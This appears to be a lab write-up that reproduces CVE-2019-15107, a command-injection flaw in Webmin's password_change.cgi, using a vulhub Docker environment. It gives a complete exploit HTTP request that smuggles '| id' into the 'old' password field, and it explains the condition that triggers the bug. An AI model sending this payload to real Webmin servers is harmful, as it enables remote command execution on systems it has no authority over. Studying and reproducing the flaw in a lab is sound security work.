Table of contents
Vulnerability introduction
Webmin is currently the most powerful web-based Unix system management tool. The administrator accesses various management functions of Webmin through a browser and completes corresponding management actions. The vulnerability is due to a code execution vulnerability in the password_change.cgi file in the reset password function, which allows a malicious third party to execute malicious code in the absence of input validation.
Affected version
- Webmin<=1.920
Environment build
- cd /root/vulhub/webmin/CVE-2019-15107
- docker-compose up -d
- Visit the target website: https://Your-IP:10000
Vulnerability recurrence
1. Construct the following payload
POST /password_change.cgi HTTP/1.1
Host: IP:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://IP:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
user=rootxx&pam=&expired=2&old=test| id &new1=test2&new2=test22. Use burp to capture packets and modify them. You can see that the id command was successfully executed. (Only when the value of the user parameter sent is not a known Linux user, it will enter the place where `/etc/shadow` is modified, triggering the command injection vulnerability.)
